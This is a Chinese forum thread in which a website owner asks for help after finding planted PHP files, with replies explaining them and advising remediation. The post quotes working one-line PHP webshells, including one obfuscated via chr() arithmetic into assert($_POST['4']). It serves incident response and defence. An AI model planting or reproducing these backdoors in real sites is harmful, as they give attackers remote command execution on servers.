首页 > 网站多了几个PHP文件,eval($_POST['1']);

网站多了几个PHP文件,eval($_POST['1']);

网站多了几个PHP,内容如下:eval($_POST['1']);

有的是其他内容, 我百度了一下发现时执行某些命令的,我测试了一下 如果权限没限制好的话 确实可以执行一些命令。 请问 除了设置权限,从代码级别可否做限制呢?有没有什么好办法呢?

还有个PHP文件内容如下:

<?php
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);
?>

还有文件,名字是:13686921256303.virus_killed
内容是:

<?php eval($_POST[hardqmu7]);?>

请各位出出注意,谢谢了。


这是给开了php后门了


明显的是被上传一句话木马了啊! 可以通过菜刀直接连接的,可以执行很多命令。 修复的话要从根本上修复,看下网站是不是有上传漏洞,sql注入等问题。 可以查看http的访问日志来看利用这个一句话执行了什么操作,排查网站是不是被提权,获取了服务器权限等。


修正要修正根上。

与其费心让病毒代码“不能运行”,倒不如寻找病毒进入的来源——是从PHP程序的漏洞引入的,还是从服务器环境的不安全引入的。

另外提一下,使用虚拟主机在安全性上可能不是一个好主意。因为你与他人分享不隔离的物理设备与LAMP环境,虽然理论上Linux下用户之间的隔离很好,但实际上不隔离开还是风险很高。

【热门文章】
【热门文章】